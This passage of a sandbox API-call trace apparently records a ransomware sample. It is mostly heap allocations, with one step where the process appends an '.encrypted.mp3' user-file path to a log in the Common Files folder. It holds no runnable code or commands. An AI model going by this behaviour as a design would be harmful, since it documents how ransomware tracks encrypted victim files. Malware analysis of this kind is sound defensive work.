returned 0x7af338 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.623] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.623] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.623] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.623] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0037.623] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.623] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.624] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0037.624] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2238, lpOverlapped=0x0) returned 1 [0037.624] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0037.624] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2238, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.624] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0037.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.encrypted.mp3\r\n", cchWideChar=82, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0037.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x52) returned 0x794b90 [0037.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.encrypted.mp3\r\n", cchWideChar=82, lpMultiByteStr=0x794b90, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.encrypted.mp3\r\n", lpUsedDefaultChar=0x0) returned 82 [0037.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0037.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0037.625] WriteFile (in: hFile=0x140, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x51, lpOverlapped=0x0) returned 1 [0037.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0037.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.625] CloseHandle (hObject=0x140) returned 1 [0037.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.626] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0037.626] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.627] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0037.627] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.627] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0037.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.627] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0037.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3e8 [0037.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0037.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898e0 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0037.628] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0037.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0037.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.632] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 